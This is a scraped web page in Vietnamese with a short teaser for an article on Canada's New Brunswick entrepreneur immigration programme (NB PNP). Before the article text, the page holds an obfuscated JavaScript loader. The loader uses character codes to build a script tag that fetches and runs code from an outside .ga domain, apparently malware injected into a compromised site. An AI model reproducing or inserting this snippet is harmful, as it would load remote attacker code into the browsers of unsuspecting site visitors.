Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Định cư Canada diện Doanh nhân tại New Brunswick (NB PNP) - Mua Nhà Mỹ

Định cư Canada diện Doanh nhân tại New Brunswick (NB PNP)

TỔNG QUAN CHƯƠNG TRÌNH NEW BRUNSWICK PROVINCIAL NOMINEE PROGRAM (NBPNP) Định cư Canada diện Doanh nhân tại New Brunswick (NB PNP) là một chương trình nhập cư cấp tỉnh được thực hiện thông qua thỏa thuận với Chính phủ Canada. Đây là một chương trình thúc đẩy kinh tế và mời gọi người nhập cư … Đọc tiếp Định cư Canada diện Doanh nhân tại New Brunswick (NB PNP)